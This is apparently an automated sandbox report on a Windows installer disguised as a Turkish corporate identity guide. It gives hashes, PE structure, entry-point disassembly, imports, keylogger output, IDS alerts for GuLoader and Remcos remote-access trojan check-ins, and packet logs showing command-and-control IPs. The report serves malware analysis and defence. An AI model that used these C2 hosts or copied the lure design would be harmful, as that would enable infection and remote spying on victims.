                                                                                                                                              Preview:....[.2.0.2.3./.1.0./.2.7. .1.6.:.2.0.:.2.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.3./.1.0./.2.7. .1.6.:.2.0.:.2.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.1.1.3.6. .m.i.n.u.t.e.s. .}.....
                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                              Entropy (8bit):7.558574413908491
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                              File name:DHRI_kurumsal_kimlik_rehberi-2023.exe
                                                                                                                                              File size:740'313 bytes
                                                                                                                                              MD5:f6cbf303899397b7d28e19930d48627d
                                                                                                                                              SHA1:c3b2d0902bc0724228519030d341294db265f379
                                                                                                                                              SHA256:2eb8015d95b1f69eca4acc3d64c0ed58125431a19df865a493990025ebe5b40a
                                                                                                                                              SHA512:0e70a67684146e4dd4d3d7984ef66b03f5370340b82cc86b1d79408c102b06bb69a31a17addec773c24fddd3e4780c35a780d549bd944aaa33a0b73f68f57b68
                                                                                                                                              SSDEEP:12288:uJWNBQf/tJK1Znk1YAxpqPf+4u+432AAjI9XLvlDwLEuSflue6VfFtqdXFJ:uWg49k1jcdDHjkbvFHfluNtqdXFJ
                                                                                                                                              TLSH:5AF4E0216A2AF903E2F203F09567DF756B618D550E7F8A738791EE2B78FC3811D18216
                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........
                                                                                                                                              Icon Hash:4dcdeeee7d595823
                                                                                                                                              Entrypoint:0x40338f
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:4
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:4
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:4
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                              Instruction
                                                                                                                                              sub esp, 000002D4h
                                                                                                                                              push ebx
                                                                                                                                              push esi
                                                                                                                                              push edi
                                                                                                                                              push 00000020h
                                                                                                                                              pop edi
                                                                                                                                              xor ebx, ebx
                                                                                                                                              push 00008001h
                                                                                                                                              mov dword ptr [esp+14h], ebx
                                                                                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                                                                              call dword ptr [004080A8h]
                                                                                                                                              call dword ptr [004080A4h]
                                                                                                                                              and eax, BFFFFFFFh
                                                                                                                                              cmp ax, 00000006h
                                                                                                                                              mov dword ptr [00434EECh], eax
                                                                                                                                              je 00007FEBC040E973h
                                                                                                                                              push ebx
                                                                                                                                              call 00007FEBC0411C25h
                                                                                                                                              cmp eax, ebx
                                                                                                                                              je 00007FEBC040E969h
                                                                                                                                              push 00000C00h
                                                                                                                                              call eax
                                                                                                                                              mov esi, 004082B0h
                                                                                                                                              push esi
                                                                                                                                              call 00007FEBC0411B9Fh
                                                                                                                                              push esi
                                                                                                                                              call dword ptr [00408150h]
                                                                                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                                                                                              cmp byte ptr [esi], 00000000h
                                                                                                                                              jne 00007FEBC040E94Ch
                                                                                                                                              push 0000000Ah
                                                                                                                                              call 00007FEBC0411BF8h
                                                                                                                                              push 00000008h
                                                                                                                                              call 00007FEBC0411BF1h
                                                                                                                                              push 00000006h
                                                                                                                                              mov dword ptr [00434EE4h], eax
                                                                                                                                              call 00007FEBC0411BE5h
                                                                                                                                              cmp eax, ebx
                                                                                                                                              je 00007FEBC040E971h
                                                                                                                                              push 0000001Eh
                                                                                                                                              call eax
                                                                                                                                              test eax, eax
                                                                                                                                              je 00007FEBC040E969h
                                                                                                                                              or byte ptr [00434EEFh], 00000040h
                                                                                                                                              push ebp
                                                                                                                                              call dword ptr [00408044h]
                                                                                                                                              push ebx
                                                                                                                                              call dword ptr [004082A0h]
                                                                                                                                              mov dword ptr [00434FB8h], eax
                                                                                                                                              push ebx
                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                              push 000002B4h
                                                                                                                                              push eax
                                                                                                                                              push ebx
                                                                                                                                              push 0042B208h
                                                                                                                                              call dword ptr [00408188h]
                                                                                                                                              push 0040A2C8h
                                                                                                                                              Programming Language:
                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7f0000x2adb8.rsrc
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              .text0x10000x66270x6800False0.6643629807692307data6.451784672975888IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                              .rdata0x80000x14a20x1600False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              .data0xa0000x2aff80x600False0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .ndata0x350000x4a0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .rsrc0x7f0000x2adb80x2ae00False0.2931623542274053data4.844476982593675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                              RT_BITMAP0x7f4900x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                              RT_ICON0x7f7f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.25415532946882763
                                                                                                                                              RT_ICON0x900200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3174795038890057
                                                                                                                                              RT_ICON0x994c80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.3372458410351202
                                                                                                                                              RT_ICON0x9e9500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.30196032120925836
                                                                                                                                              RT_ICON0xa2b780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.37105809128630707
                                                                                                                                              RT_ICON0xa51200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.41135084427767354
                                                                                                                                              RT_ICON0xa61c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.35954157782515994
                                                                                                                                              RT_ICON0xa70700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5004098360655738
                                                                                                                                              RT_ICON0xa79f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.35333935018050544
                                                                                                                                              RT_ICON0xa82a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.35023041474654376
                                                                                                                                              RT_ICON0xa89680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.26372832369942195
                                                                                                                                              RT_ICON0xa8ed00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5647163120567376
                                                                                                                                              RT_DIALOG0xa93380x144dataEnglishUnited States0.5216049382716049
                                                                                                                                              RT_DIALOG0xa94800x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                              RT_DIALOG0xa95c00x100dataEnglishUnited States0.5234375
                                                                                                                                              RT_DIALOG0xa96c00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                              RT_DIALOG0xa97e00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                              RT_GROUP_ICON0xa98400xaedataEnglishUnited States0.6609195402298851
                                                                                                                                              RT_VERSION0xa98f00x178VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79EnglishUnited States0.5664893617021277
                                                                                                                                              RT_MANIFEST0xa9a680x34eXML 1.0 document, ASCII text, with very long lines (846), with no line terminatorsEnglishUnited States0.5141843971631206
                                                                                                                                              DLLImport
                                                                                                                                              KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                              EnglishUnited States
                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                              192.168.11.20217.147.225.6949745802855192 10/27/23-16:20:25.826419TCP2855192ETPRO TROJAN GuLoader Encoded Binary Request M24974580192.168.11.20217.147.225.69
                                                                                                                                              192.168.11.2094.156.6.2534974624022032776 10/27/23-16:20:30.134330TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497462402192.168.11.2094.156.6.253
                                                                                                                                              94.156.6.253192.168.11.202402497462032777 10/27/23-16:26:57.279387TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response24024974694.156.6.253192.168.11.20
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Oct 27, 2023 16:20:25.521825075 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:25.825726032 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:25.825916052 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:25.826419115 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.130022049 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.132560015 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.132677078 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.132775068 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.132838011 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.132859945 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.132906914 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.132927895 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.133009911 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.133024931 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.133081913 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.133150101 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.133178949 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.133178949 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.133223057 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.133289099 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.133353949 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.133353949 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.133548021 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.437109947 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437227011 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437294006 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437376022 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437391996 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.437442064 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437475920 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.437475920 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.437516928 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437585115 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437612057 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.437655926 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437735081 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437798977 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437817097 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.437872887 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.437877893 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437942982 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.437994957 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.437995911 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438019991 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.438061953 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438086987 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.438148975 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.438183069 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438229084 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.438240051 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438292980 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.438357115 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438358068 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438369036 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.438425064 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438425064 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438436031 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.438499928 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.438590050 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438590050 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.438762903 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.742258072 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742376089 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742444038 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742527008 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742592096 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742595911 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.742664099 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.742680073 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742755890 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742784023 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.742784023 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.742836952 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742904902 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.742954016 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.742970943 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743032932 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743033886 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743048906 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743082047 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743114948 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743194103 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743202925 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743257999 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743258953 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743325949 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743397951 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743402004 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743397951 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743465900 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743467093 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743546963 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743593931 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743593931 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743611097 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743660927 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743695021 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743765116 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743778944 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743778944 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743833065 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743913889 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.743957996 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743957996 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.743983984 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744028091 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744141102 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744154930 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744155884 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744231939 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744296074 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744349957 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744378090 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744406939 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744447947 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744518042 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744523048 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744523048 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744590044 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744652033 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744692087 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744730949 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744769096 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744769096 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744795084 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744815111 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744868994 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744884014 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.744940996 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.744946957 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.745004892 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.745054007 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.745090961 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.745101929 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.745155096 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.745156050 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.745238066 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:26.745270967 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.745320082 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:26.745388985 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.049235106 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049336910 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049401045 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049474001 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049539089 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049537897 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.049539089 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.049539089 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:27.049593925 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049664974 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:27.049668074 CEST4974580192.168.11.20217.147.225.69
